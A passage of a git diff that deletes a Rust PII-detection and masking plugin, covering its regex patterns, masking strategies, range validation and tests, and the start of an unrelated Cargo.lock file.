compile_patterns(&config).unwrap(); - let detector = PIIDetectorRust { patterns, config }; - - assert!( - detector - .detect_internal("+353871234567") - .contains_key(&PIIType::Phone) - ); - } - - #[test] - fn test_mask_rejects_missing_detection_fields() { - Python::initialize(); - Python::attach(|py| { - let config = PIIConfig { - detect_email: true, - ..Default::default() - }; - let patterns = compile_patterns(&config).unwrap(); - let detector = PIIDetectorRust { patterns, config }; - - let detections = PyDict::new(py); - let items = PyList::empty(py); - let bad_detection = PyDict::new(py); - bad_detection.set_item("value", "john@example.com").unwrap(); - bad_detection.set_item("start", 0).unwrap(); - bad_detection.set_item("end", 16).unwrap(); - items.append(bad_detection).unwrap(); - detections.set_item("email", items).unwrap(); - - let err = detector - .mask("john@example.com", &detections.into_any()) - .unwrap_err(); - assert!(err.is_instance_of::(py)); - }); - } - - #[test] - fn test_mask_rejects_oversized_input() { - Python::initialize(); - Python::attach(|py| { - let config = PyDict::new(py); - config.set_item("detect_email", true).unwrap(); - config.set_item("max_text_bytes", 8).unwrap(); - - let detector = PIIDetectorRust::new(&config.into_any()).unwrap(); - let detections = PyDict::new(py); - let items = PyList::empty(py); - let detection = PyDict::new(py); - detection.set_item("value", "123456789").unwrap(); - detection.set_item("start", 0).unwrap(); - detection.set_item("end", 9).unwrap(); - detection.set_item("mask_strategy", "redact").unwrap(); - items.append(detection).unwrap(); - detections.set_item("custom", items).unwrap(); - - let err = detector - .mask("123456789", &detections.into_any()) - .unwrap_err(); - assert!(err.is_instance_of::(py)); - }); - } - - #[test] - fn test_mask_rejects_invalid_detection_ranges() { - Python::initialize(); - Python::attach(|py| { - let config = PIIConfig { - detect_email: true, - ..Default::default() - }; - let patterns = compile_patterns(&config).unwrap(); - let detector = PIIDetectorRust { patterns, config }; - - let detections = PyDict::new(py); - let items = PyList::empty(py); - let bad_detection = PyDict::new(py); - bad_detection.set_item("value", "john@example.com").unwrap(); - bad_detection.set_item("start", 99).unwrap(); - bad_detection.set_item("end", 100).unwrap(); - bad_detection.set_item("mask_strategy", "partial").unwrap(); - items.append(bad_detection).unwrap(); - detections.set_item("email", items).unwrap(); - - let err = detector - .mask("john@example.com", &detections.into_any()) - .unwrap_err(); - assert!(err.is_instance_of::(py)); - }); - } -} diff --git a/plugins_rust/pii_filter/src/lib.rs b/plugins_rust/pii_filter/src/lib.rs deleted file mode 100644 index f8095787b3..0000000000 --- a/plugins_rust/pii_filter/src/lib.rs +++ /dev/null @@ -1,29 +0,0 @@ -// Copyright 2025 -// SPDX-License-Identifier: Apache-2.0 -// -// PII Filter Plugin - Rust Implementation -// -// High-performance PII detection and masking using: -// - RegexSet for parallel pattern matching (5-10x faster) -// - Copy-on-write strings for zero-copy operations -// - Zero-copy JSON traversal with serde_json - -use pyo3::prelude::*; -use pyo3_stub_gen::define_stub_info_gatherer; - -pub mod config; -pub mod detector; -pub mod masking; -pub mod patterns; - -pub use detector::PIIDetectorRust; - -/// Python module definition -#[pymodule] -fn pii_filter_rust(m: &Bound<'_, PyModule>) -> PyResult<()> { - m.add_class::()?; - Ok(()) -} - -// Define stub info gatherer for generating Python type stubs -define_stub_info_gatherer!(stub_info); diff --git a/plugins_rust/pii_filter/src/masking.rs b/plugins_rust/pii_filter/src/masking.rs deleted file mode 100644 index 4a1bb0d931..0000000000 --- a/plugins_rust/pii_filter/src/masking.rs +++ /dev/null @@ -1,353 +0,0 @@ -// Copyright 2025 -// SPDX-License-Identifier: Apache-2.0 -// -// Masking strategies for detected PII - -use sha2::{Digest, Sha256}; -use std::borrow::Cow; -use std::collections::HashMap; -use uuid::Uuid; - -use super::config::{MaskingStrategy, PIIConfig, PIIType}; -use super::detector::Detection; - -/// Apply masking to detected PII in text -/// -/// # Arguments -/// * `text` - Original text containing PII -/// * `detections` - Map of PIIType to detected instances -/// * `config` - Configuration with masking preferences -/// -/// # Returns -/// Masked text with PII replaced according to strategies -pub fn mask_pii<'a>( - text: &'a str, - detections: &HashMap>, - config: &PIIConfig, -) -> Result, String> { - if detections.is_empty() { - // Zero-copy optimization when no masking needed - return Ok(Cow::Borrowed(text)); - } - - validate_detection_ranges(text, detections)?; - - // Collect all detections with their positions - let mut all_detections: Vec<(&Detection, PIIType)> = Vec::new(); - for (pii_type, items) in detections { - for detection in items { - all_detections.push((detection, *pii_type)); - } - } - - // Sort by start position (reverse order for stable replacement) - all_detections.sort_by(|a, b| b.0.start.cmp(&a.0.start)); - - // Apply masking from end to start - let mut result = text.to_string(); - for (detection, pii_type) in all_detections { - let masked_value = - apply_mask_strategy(&detection.value, pii_type, detection.mask_strategy, config); - - result.replace_range(detection.start..detection.end, &masked_value); - } - - Ok(Cow::Owned(result)) -} - -fn validate_detection_ranges( - text: &str, - detections: &HashMap>, -) -> Result<(), String> { - let mut ranges: Vec<(usize, usize)> = Vec::new(); - - for items in detections.values() { - for detection in items { - if detection.start > detection.end { - return Err(format!( - "Invalid detection range: start {} is after end {}", - detection.start, detection.end - )); - } - - if detection.end > text.len() { - return Err(format!( - "Invalid detection range: end {} exceeds text length {}", - detection.end, - text.len() - )); - } - - if !text.is_char_boundary(detection.start) || !text.is_char_boundary(detection.end) { - return Err(format!( - "Invalid detection range: offsets {}..{} must align to UTF-8 boundaries (text len: {})", - detection.start, - detection.end, - text.len() - )); - } - - ranges.push((detection.start, detection.end)); - } - } - - ranges.sort_unstable(); - for window in ranges.windows(2) { - if let [(prev_start, prev_end), (next_start, _)] = window - && next_start < prev_end - { - return Err(format!( - "Overlapping detection ranges are not supported: {}..{} overlaps a later span", - prev_start, prev_end - )); - } - } - - Ok(()) -} - -/// Apply specific masking strategy to a value -fn apply_mask_strategy( - value: &str, - pii_type: PIIType, - strategy: MaskingStrategy, - config: &PIIConfig, -) -> String { - match strategy { - MaskingStrategy::Redact => config.redaction_text.clone(), - MaskingStrategy::Partial => partial_mask(value, pii_type), - MaskingStrategy::Hash => hash_mask(value), - MaskingStrategy::Tokenize => tokenize_mask(), - MaskingStrategy::Remove => String::new(), - } -} - -/// Partial masking - show first/last characters based on PII type -fn partial_mask(value: &str, pii_type: PIIType) -> String { - match pii_type { - PIIType::Ssn => { - // Show last 4 digits: ***-**-1234 - if value.len() >= 4 { - format!("***-**-{}", &value[value.len() - 4..]) - } else { - "***-**-****".to_string() - } - } - - PIIType::Bsn => { - // Show last 4 digits: *****1234 - if value.len() >= 4 { - format!("*****{}", &value[value.len() - 4..]) - } else { - "[REDACTED]".to_string() - } - } - - PIIType::CreditCard => { - // Show last 4 digits: ****-****-****-1234 - let digits_only: String = value.chars().filter(|c| c.is_ascii_digit()).collect(); - if digits_only.len() >= 4 { - format!("****-****-****-{}", &digits_only[digits_only.len() - 4..]) - } else { - "****-****-****-****".to_string() - } - } - - PIIType::Email => { - // Show first + last char before @: j***e@example.com - if let Some(at_pos) = value.find('@') { - let local = &value[..at_pos]; - let domain = &value[at_pos..]; - - if local.len() > 2 { - format!("{}***{}{}", &local[..1], &local[local.len() - 1..], domain) - } else { - format!("***{}", domain) - } - } else { - "[REDACTED]".to_string() - } - } - - PIIType::Phone => { - // Show last 4 digits: ***-***-1234 - let digits_only: String = value.chars().filter(|c| c.is_ascii_digit()).collect(); - if digits_only.len() >= 4 { - format!("***-***-{}", &digits_only[digits_only.len() - 4..]) - } else { - "***-***-****".to_string() - } - } - - PIIType::BankAccount => { - // Show last 4 for IBAN-like, redact others - if value.len() >= 4 && value.chars().any(|c| c.is_ascii_alphabetic()) { - // IBAN format: XX**************1234 - format!( - "{}{}", - &value[..2], - "*".repeat(value.len() - 6) + &value[value.len() - 4..] - ) - } else { - "[REDACTED]".to_string() - } - } - - _ => { - // Generic partial masking: first + last char - let chars: Vec = value.chars().collect(); - - if chars.len() > 2 { - format!( - "{}{}{}", - chars[0], - "*".repeat(chars.len() - 2), - chars[chars.len() - 1] - ) - } else if chars.len() == 2 { - format!("{}*", chars[0]) - } else { - "*".to_string() - } - } - } -} - -/// Hash masking using SHA256 -fn hash_mask(value: &str) -> String { - let mut hasher = Sha256::new(); - hasher.update(value.as_bytes()); - let result = hasher.finalize(); - format!("[HASH:{}]", &format!("{:x}", result)[..16]) -} - -/// Tokenize using UUID v4 -fn tokenize_mask() -> String { - let token = Uuid::new_v4(); - format!("[TOKEN:{}]", &token.simple().to_string()[..8]) -} - -#[cfg(test)] -mod tests { - use super::*; - - #[test] - fn test_partial_mask_ssn() { - let result = partial_mask("123-45-6789", PIIType::Ssn); - assert_eq!(result, "***-**-6789"); - } - - #[test] - fn test_partial_mask_credit_card() { - let result = partial_mask("4111-1111-1111-1111", PIIType::CreditCard); - assert_eq!(result, "****-****-****-1111"); - } - - #[test] - fn test_partial_mask_email() { - let result = partial_mask("john.doe@example.com", PIIType::Email); - assert!(result.contains("@example.com")); - assert!(result.starts_with("j")); - } - - #[test] - fn test_hash_mask() { - let result = hash_mask("sensitive"); - assert!(result.starts_with("[HASH:")); - assert!(result.ends_with("]")); - assert_eq!(result.len(), 23); // [HASH:xxxxxxxxxxxxxxxx] - } - - #[test] - fn test_tokenize_mask() { - let result = tokenize_mask(); - assert!(result.starts_with("[TOKEN:")); - assert!(result.ends_with("]")); - } - - #[test] - fn test_mask_pii_empty() { - let config = PIIConfig::default(); - let detections = HashMap::new(); - let text = "No PII here"; - - let result = mask_pii(text, &detections, &config).unwrap(); - assert_eq!(result, text); // Zero-copy - } - - #[test] - fn test_partial_mask_custom_unicode_does_not_panic() { - let config = PIIConfig { - default_mask_strategy: MaskingStrategy::Partial, - ..Default::default() - }; - let text = "Contact José at jose@example.com and Jose Alvarez tomorrow"; - let unicode_value = "José"; - let start = text.find(unicode_value).unwrap(); - let end = start + unicode_value.len(); - - let mut detections = HashMap::new(); - detections.insert( - PIIType::Custom, - vec![Detection { - value: unicode_value.to_string(), - start, - end, - mask_strategy: MaskingStrategy::Partial, - }], - ); - - let result = mask_pii(text, &detections, &config).unwrap(); - assert_eq!( - result, - "Contact J**é at jose@example.com and Jose Alvarez tomorrow" - ); - } - - #[test] - fn test_mask_pii_rejects_overlapping_ranges() { - let config = PIIConfig::default(); - let text = "abcdef"; - let mut detections = HashMap::new(); - detections.insert( - PIIType::Custom, - vec![ - Detection { - value: "abc".to_string(), - start: 0, - end: 3, - mask_strategy: MaskingStrategy::Redact, - }, - Detection { - value: "bcd".to_string(), - start: 1, - end: 4, - mask_strategy: MaskingStrategy::Redact, - }, - ], - ); - - let err = mask_pii(text, &detections, &config).unwrap_err(); - assert!(err.contains("Overlapping detection ranges")); - } - - #[test] - fn test_mask_pii_reports_utf8_boundary_offsets() { - let config = PIIConfig::default(); - let text = "Joé"; - let mut detections = HashMap::new(); - detections.insert( - PIIType::Custom, - vec![Detection { - value: "o".to_string(), - start: 3, - end: 3, - mask_strategy: MaskingStrategy::Redact, - }], - ); - - let err = mask_pii(text, &detections, &config).unwrap_err(); - assert!(err.contains("offsets 3..3")); - assert!(err.contains(&format!("text len: {}", text.len()))); - } -} diff --git a/plugins_rust/pii_filter/src/patterns.rs b/plugins_rust/pii_filter/src/patterns.rs deleted file mode 100644 index b1dbc52bf5..0000000000 --- a/plugins_rust/pii_filter/src/patterns.rs +++ /dev/null @@ -1,465 +0,0 @@ -// Copyright 2025 -// SPDX-License-Identifier: Apache-2.0 -// -// Regex pattern compilation for PII detection -// Uses RegexSet for parallel matching (5-10x faster than sequential) - -use once_cell::sync::Lazy; -use regex::{Regex, RegexSet}; - -use super::config::{MaskingStrategy, PIIConfig, PIIType}; - -/// Compiled pattern with metadata -#[derive(Debug, Clone)] -pub struct CompiledPattern { - pub pii_type: PIIType, - pub regex: Regex, - pub mask_strategy: Option, - #[allow(dead_code)] - pub description: String, -} - -/// All compiled patterns with RegexSet for parallel matching -pub struct CompiledPatterns { - pub regex_set: RegexSet, - pub patterns: Vec, - pub whitelist: Vec, -} - -/// Pattern definitions (pattern, description, explicit masking strategy) -type PatternDef = (&'static str, &'static str, MaskingStrategy); - -const VALID_SSN_DASHED_PATTERN: &str = r"\b(?:00[1-9]|0[1-9][0-9]|[1-5][0-9]{2}|6(?:[0-5][0-9]|6[0-57-9]|[7-9][0-9])|[7-8][0-9]{2})-(?:0[1-9]|[1-9][0-9])-(?:000[1-9]|00[1-9][0-9]|0[1-9][0-9]{2}|[1-9][0-9]{3})\b"; -const VALID_SSN_CONTEXTUAL_PATTERN: &str = r"\b(?:SSN|Social\s+Security(?:\s+Number)?)[:\s#-]*(?:00[1-9]|0[1-9][0-9]|[1-5][0-9]{2}|6(?:[0-5][0-9]|6[0-57-9]|[7-9][0-9])|[7-8][0-9]{2})(?:0[1-9]|[1-9][0-9])(?:000[1-9]|00[1-9][0-9]|0[1-9][0-9]{2}|[1-9][0-9]{3})\b"; - -// SSN patterns -static SSN_PATTERNS: Lazy> = Lazy::new(|| { - vec![ - ( - VALID_SSN_DASHED_PATTERN, - "US Social Security Number", - MaskingStrategy::Partial, - ), - ( - VALID_SSN_CONTEXTUAL_PATTERN, - "US Social Security Number with explicit context", - MaskingStrategy::Partial, - ), - ] -}); - -// BSN patterns (Dutch Burgerservicenummer) -// Match 9-digit numbers only with explicit BSN-style context to avoid broad false positives. -static BSN_PATTERNS: Lazy> = Lazy::new(|| { - vec![ - ( - r"\b(?:BSN|Citizen\s+ID|Citizen\s+Service\s+Number|Burgerservicenummer)[:\s#]*\d{9}\b", - "Dutch BSN with explicit context", - MaskingStrategy::Partial, - ), - ( - r"\b(?:My\s+)?BSN\s+(?:is\s+)?\d{9}\b", - "BSN with 'is' context", - MaskingStrategy::Partial, - ), - ] -}); - -// Credit card patterns -static CREDIT_CARD_PATTERNS: Lazy> = Lazy::new(|| { - vec![( - r"\b(?:\d{4}[-\s]?){3}\d{4}\b", - "Credit card number", - MaskingStrategy::Partial, - )] -}); - -// Email patterns -static EMAIL_PATTERNS: Lazy> = Lazy::new(|| { - vec![( - r"\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b", - "Email address", - MaskingStrategy::Partial, - )] -}); - -// Phone patterns (US and international) -static PHONE_PATTERNS: Lazy> = Lazy::new(|| { - vec![ - ( - r"\b(?:\+?1[-.\s]?)?\(?\d{3}\)?[-.\s]?\d{3}[-.\s]?\d{4}\b", - "US phone number", - MaskingStrategy::Partial, - ), - ( - r"\+[1-9]\d{9,14}\b", - "International phone number", - MaskingStrategy::Partial, - ), - ] -}); - -// IP address patterns (IPv4 and IPv6) -static IP_ADDRESS_PATTERNS: Lazy> = Lazy::new(|| { - vec![ - ( - r"\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b", - "IPv4 address", - MaskingStrategy::Redact, - ), - ( - r"\b(?:[A-Fa-f0-9]{1,4}:){7}[A-Fa-f0-9]{1,4}\b", - "IPv6 address", - MaskingStrategy::Redact, - ), - ] -}); - -// Date of birth patterns -static DOB_PATTERNS: Lazy> = Lazy::new(|| { - vec![ - ( - r"\b(?:DOB|Date of Birth|Born|Birthday)[:\s]+\d{1,2}[-/]\d{1,2}[-/]\d{2,4}\b", - "Date of birth with label", - MaskingStrategy::Redact, - ), - ( - r"\b(?:0[1-9]|1[0-2])[-/](?:0[1-9]|[12]\d|3[01])[-/](?:19|20)\d{2}\b", - "Date in MM/DD/YYYY format", - MaskingStrategy::Redact, - ), - ] -}); - -// Passport patterns -static PASSPORT_PATTERNS: Lazy> = Lazy::new(|| { - vec![( - r"\b(?:Passport\s+Number|Passport\s+No|Passport)[#:\s-]+[A-Z0-9]{6,9}\b", - "Passport number with explicit context", - MaskingStrategy::Redact, - )] -}); - -// Driver's license patterns -static DRIVER_LICENSE_PATTERNS: Lazy> = Lazy::new(|| { - vec![( - r"\b(?:DL|License|Driver'?s? License)[#:\s]+[A-Z0-9]{5,20}\b", - "Driver's license number", - MaskingStrategy::Redact, - )] -}); - -// Bank account patterns -static BANK_ACCOUNT_PATTERNS: Lazy> = Lazy::new(|| { - vec![ - ( - r"\b(?:Account|Acct|Bank\s+Account|Account\s+Number|Routing\s+Account)[#:\s-]*\d{8,17}\b", - "Bank account number with explicit context", - MaskingStrategy::Redact, - ), - ( - r"\b[A-Z]{2}\d{2}[A-Z0-9]{4}\d{7}(?:\d{3})?\b", - "IBAN", - MaskingStrategy::Partial, - ), - ] -}); - -// Medical record patterns -static MEDICAL_RECORD_PATTERNS: Lazy> = Lazy::new(|| { - vec![( - r"\b(?:MRN|Medical Record)[#:\s]+[A-Z0-9]{6,12}\b", - "Medical record number", - MaskingStrategy::Redact, - )] -}); - -/// Compile patterns based on configuration -pub fn compile_patterns(config: &PIIConfig) -> Result { - let mut pattern_strings = Vec::new(); - let mut patterns = Vec::new(); - - // Helper macro to add patterns with case-insensitive matching (match Python behavior) - macro_rules! add_patterns { - ($enabled:expr, $pii_type:expr, $pattern_list:expr) => { - if $enabled { - for (pattern, description, mask_strategy) in $pattern_list.iter() { - // Add case-insensitive flag to pattern string for RegexSet - pattern_strings.push(format!("(?i){}", pattern)); - let regex = regex::RegexBuilder::new(pattern) - .case_insensitive(true) - .build() - .map_err(|e| format!("Failed to compile pattern '{}': {}", pattern, e))?; - patterns.push(CompiledPattern { - pii_type: $pii_type, - regex, - mask_strategy: Some(*mask_strategy), - description: description.to_string(), - }); - } - } - }; - } - - // Add patterns based on config - add_patterns!(config.detect_bsn, PIIType::Bsn, &*BSN_PATTERNS); - add_patterns!(config.detect_ssn, PIIType::Ssn, &*SSN_PATTERNS); - add_patterns!( - config.detect_credit_card, - PIIType::CreditCard, - &*CREDIT_CARD_PATTERNS - ); - add_patterns!(config.detect_email, PIIType::Email, &*EMAIL_PATTERNS); - add_patterns!(config.detect_phone, PIIType::Phone, &*PHONE_PATTERNS); - add_patterns!( - config.detect_ip_address, - PIIType::IpAddress, - &*IP_ADDRESS_PATTERNS - ); - add_patterns!( - config.detect_date_of_birth, - PIIType::DateOfBirth, - &*DOB_PATTERNS - ); - add_patterns!( - config.detect_passport, - PIIType::Passport, - &*PASSPORT_PATTERNS - ); - add_patterns!( - config.detect_driver_license, - PIIType::DriverLicense, - &*DRIVER_LICENSE_PATTERNS - ); - add_patterns!( - config.detect_bank_account, - PIIType::BankAccount, - &*BANK_ACCOUNT_PATTERNS - ); - add_patterns!( - config.detect_medical_record, - PIIType::MedicalRecord, - &*MEDICAL_RECORD_PATTERNS - ); - - // Add custom patterns - for custom in &config.custom_patterns { - if custom.enabled { - validate_custom_pattern(&custom.pattern)?; - - // Add case-insensitive flag to pattern string for RegexSet - pattern_strings.push(format!("(?i){}", custom.pattern)); - let regex = regex::RegexBuilder::new(&custom.pattern) - .case_insensitive(true) - .build() - .map_err(|e| { - format!( - "Failed to compile custom pattern '{}': {}", - custom.pattern, e - ) - })?; - patterns.push(CompiledPattern { - pii_type: PIIType::Custom, - regex, - mask_strategy: Some(custom.mask_strategy), - description: custom.description.clone(), - }); - } - } - - // Compile RegexSet for parallel matching - // Handle empty pattern set gracefully (all detectors disabled) - let regex_set = if pattern_strings.is_empty() { - RegexSet::empty() - } else { - RegexSet::new(&pattern_strings).map_err(|e| format!("Failed to compile RegexSet: {}", e))? - }; - - // Compile whitelist patterns with error checking and case-insensitive (match Python behavior) - let mut whitelist = Vec::new(); - for pattern in &config.whitelist_patterns { - match regex::RegexBuilder::new(pattern) - .case_insensitive(true) - .build() - { - Ok(regex) => whitelist.push(regex), - Err(e) => return Err(format!("Invalid whitelist pattern '{}': {}", pattern, e)), - } - } - - Ok(CompiledPatterns { - regex_set, - patterns, - whitelist, - }) -} - -/// Validate admin-authored custom patterns before compilation. -/// -/// These patterns come from trusted plugin configuration rather than end-user input. -/// The Rust `regex` crate uses a linear-time engine without catastrophic backtracking, -/// so these limits are lightweight guardrails for readability, compile cost, and -/// obvious mistakes instead of a full regex sandbox. -fn validate_custom_pattern(pattern: &str) -> Result<(), String> { - const MAX_CUSTOM_PATTERN_LEN: usize = 256; - const MAX_ALTERNATIONS: usize = 16; - const MAX_QUANTIFIERS: usize = 24; - - if pattern.trim().is_empty() { - return Err("Custom pattern cannot be empty".to_string()); - } - - if pattern.len() > MAX_CUSTOM_PATTERN_LEN { - return Err(format!( - "Custom pattern exceeds {} characters", - MAX_CUSTOM_PATTERN_LEN - )); - } - - let alternations = pattern.matches('|').count(); - if alternations > MAX_ALTERNATIONS { - return Err(format!( - "Custom pattern has too many alternations (max {})", - MAX_ALTERNATIONS - )); - } - - let quantifiers = pattern - .chars() - .filter(|ch| matches!(ch, '*' | '+' | '?')) - .count() - + pattern.matches('{').count(); - if quantifiers > MAX_QUANTIFIERS { - return Err(format!( - "Custom pattern has too many quantifiers (max {})", - MAX_QUANTIFIERS - )); - } - - Ok(()) -} - -#[cfg(test)] -mod tests { - use super::*; - - #[test] - fn test_compile_patterns() { - let config = PIIConfig::default(); - let compiled = compile_patterns(&config).unwrap(); - - // Should have patterns for all enabled types - assert!(!compiled.patterns.is_empty()); - assert!(!compiled.regex_set.is_empty()); - } - - #[test] - fn test_ssn_pattern() { - let config = PIIConfig { - detect_ssn: true, - ..Default::default() - }; - let compiled = compile_patterns(&config).unwrap(); - - let text = "My SSN is 123-45-6789"; - let matches: Vec<_> = compiled.regex_set.matches(text).into_iter().collect(); - - assert!(!matches.is_empty()); - } - - #[test] - fn test_invalid_ssn_does_not_match_regex_set() { - let config = PIIConfig { - detect_ssn: true, - detect_bsn: false, - ..Default::default() - }; - let compiled = compile_patterns(&config).unwrap(); - - let text = "SSN: 000-12-3456"; - let matches: Vec<_> = compiled.regex_set.matches(text).into_iter().collect(); - - assert!(matches.is_empty()); - } - - #[test] - fn test_valid_ssn_in_656_to_699_range_matches_regex_set() { - let config = PIIConfig { - detect_ssn: true, - detect_bsn: false, - ..Default::default() - }; - let compiled = compile_patterns(&config).unwrap(); - - let text = "SSN: 667-12-3456"; - let matches: Vec<_> = compiled.regex_set.matches(text).into_iter().collect(); - - assert!(!matches.is_empty()); - } - - #[test] - fn test_empty_regex_set_when_all_detectors_disabled() { - let config = PIIConfig { - detect_ssn: false, - detect_bsn: false, - detect_credit_card: false, - detect_email: false, - detect_phone: false, - detect_ip_address: false, - detect_date_of_birth: false, - detect_passport: false, - detect_driver_license: false, - detect_bank_account: false, - detect_medical_record: false, - ..Default::default() - }; - - let compiled = compile_patterns(&config).unwrap(); - assert!(compiled.regex_set.is_empty()); - assert!(compiled.patterns.is_empty()); - } - - #[test] - fn test_email_pattern() { - let config = PIIConfig { - detect_email: true, - ..Default::default() - }; - let compiled = compile_patterns(&config).unwrap(); - - let text = "Contact me at john.doe@example.com"; - let matches: Vec<_> = compiled.regex_set.matches(text).into_iter().collect(); - - assert!(!matches.is_empty()); - } - - #[test] - fn test_rejects_overly_complex_custom_pattern() { - let mut config = PIIConfig::default(); - config.custom_patterns.push(super::super::config::CustomPattern { - pattern: "(foo|bar|baz|qux|one|two|three|four|five|six|seven|eight|nine|ten|eleven|twelve|thirteen|fourteen|fifteen|sixteen|seventeen|eighteen)".to_string(), - description: "Too many branches".to_string(), - mask_strategy: MaskingStrategy::Redact, - enabled: true, - }); - - let err = compile_patterns(&config).err().unwrap(); - assert!(err.contains("too many alternations")); - } - - #[test] - fn test_accepts_escaped_literals_in_custom_pattern_complexity_check() { - let mut config = PIIConfig::default(); - config - .custom_patterns - .push(super::super::config::CustomPattern { - pattern: r"foo\|bar\+\?\{baz\}".to_string(), - description: "Escaped regex metacharacters".to_string(), - mask_strategy: MaskingStrategy::Redact, - enabled: true, - }); - - let compiled = compile_patterns(&config); - assert!(compiled.is_ok()); - } -} diff --git a/plugins_rust/rate_limiter/Cargo.lock b/plugins_rust/rate_limiter/Cargo.lock deleted file mode 100644 index 917a9c8f5b..0000000000 --- a/plugins_rust/rate_limiter/Cargo.lock +++ /dev/null @@ -1,2027 +0,0 @@ -# This file is automatically @generated by Cargo. -# It is not intended for manual editing. -version = 4 - -[[package]] -name = "aho-corasick" -version = "1.1.4" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ddd31a130427c27518df266943a5308ed92d4b226cc639f5a8f1002816174301" -dependencies = [ - "memchr", -] - -[[package]] -name = "alloca" -version = "0.4.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e5a7d05ea6aea7e9e64d25b9156ba2fee3fdd659e34e41063cd2fc7cd020d7f4" -dependencies = [ - "cc", -] - -[[package]] -name = "android_system_properties" -version = "0.1.5" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "819e7219dbd41043ac279b19830f2efc897156490d7fd6ea916720117ee66311" -dependencies = [ - "libc", -] - -[[package]] -name = "anes" -version = "0.1.6" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4b46cbb362ab8752921c97e041f5e366ee6297bd428a31275b9fcf1e380f7299" - -[[package]] -name = "anstyle" -version = "1.0.14" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "940b3a0ca603d1eade50a4846a2afffd5ef57a9feac2c0e2ec2e14f9ead76000" - -[[package]] -name = "anyhow" -version = "1.0.102" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7f202df86484c868dbad7eaa557ef785d5c66295e41b460ef922eca0723b842c" - -[[package]] -name = "arc-swap" -version = "1.9.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a07d1f37ff60921c83bdfc7407723bdefe89b44b98a9b772f225c8f9d67141a6" -dependencies = [ - "rustversion", -] - -[[package]] -name = "async-trait" -version = "0.1.89" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9035ad2d096bed7955a320ee7e2230574d28fd3c3a0f186cbea1ff3c7eed5dbb" -dependencies = [ - "proc-macro2", - "quote", - "syn", -] - -[[package]] -name = "autocfg" -version = "1.5.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c08606f8c3cbf4ce6ec8e28fb0014a2c086708fe954eaa885384a6165172e7e8" - -[[package]] -name = "bitflags" -version = "2.11.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "843867be96c8daad0d758b57df9392b6d8d271134fce549de6ce169ff98a92af" - -[[package]] -name = "bumpalo" -version = "3.20.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5d20789868f4b01b2f2caec9f5c4e0213b41e3e5702a50157d699ae31ced2fcb" - -[[package]] -name = "bytes" -version = "1.11.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "1e748733b7cbc798e1434b6ac524f0c1ff2ab456fe201501e6497c8417a4fc33" - -[[package]] -name = "cast" -version = "0.3.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "37b2a672a2cb129a2e41c10b1224bb368f9f37a2b16b612598138befd7b37eb5" - -[[package]] -name = "cc" -version = "1.2.57" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7a0dd1ca384932ff3641c8718a02769f1698e7563dc6974ffd03346116310423" -dependencies = [ - "find-msvc-tools", - "shlex", -] - -[[package]] -name = "cfg-if" -version = "1.0.4" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9330f8b2ff13f34540b44e946ef35111825727b38d33286ef986142615121801" - -[[package]] -name = "chrono" -version = "0.4.44" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c673075a2e0e5f4a1dde27ce9dee1ea4558c7ffe648f576438a20ca1d2acc4b0" -dependencies = [ - "iana-time-zone", - "js-sys", - "num-traits", - "wasm-bindgen", - "windows-link", -] - -[[package]] -name = "ciborium" -version = "0.2.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "42e69ffd6f0917f5c029256a24d0161db17cea3997d185db0d35926308770f0e" -dependencies = [ - "ciborium-io", - "ciborium-ll", - "serde", -] - -[[package]] -name = "ciborium-io" -version = "0.2.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "05afea1e0a06c9be33d539b876f1ce3692f4afea2cb41f740e7743225ed1c757" - -[[package]] -name = "ciborium-ll" -version = "0.2.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "57663b653d948a338bfb3eeba9bb2fd5fcfaecb9e199e87e1eda4d9e8b240fd9" -dependencies = [ - "ciborium-io", - "half", -] - -[[package]] -name = "clap" -version = "4.6.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b193af5b67834b676abd72466a96c1024e6a6ad978a1f484bd90b85c94041351" -dependencies = [ - "clap_builder", -] - -[[package]] -name = "clap_builder" -version = "4.6.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "714a53001bf66416adb0e2ef5ac857140e7dc3a0c48fb28b2f10762fc4b5069f" -dependencies = [ - "anstyle", - "clap_lex", -] - -[[package]] -name = "clap_lex" -version = "1.1.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c8d4a3bb8b1e0c1050499d1815f5ab16d04f0959b233085fb31653fbfc9d98f9" - -[[package]] -name = "combine" -version = "4.6.7" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ba5a308b75df32fe02788e748662718f03fde005016435c444eea572398219fd" -dependencies = [ - "bytes", - "futures-core", - "memchr", - "pin-project-lite", - "tokio", - "tokio-util", -] - -[[package]] -name = "core-foundation-sys" -version = "0.8.7" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "773648b94d0e5d620f64f280777445740e61fe701025087ec8b57f45c791888b" - -[[package]] -name = "criterion" -version = "0.8.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "950046b2aa2492f9a536f5f4f9a3de7b9e2476e575e05bd6c333371add4d98f3" -dependencies = [ - "alloca", - "anes", - "cast", - "ciborium", - "clap", - "criterion-plot", - "itertools 0.13.0", - "num-traits", - "oorandom", - "page_size", - "plotters", - "rayon", - "regex", - "serde", - 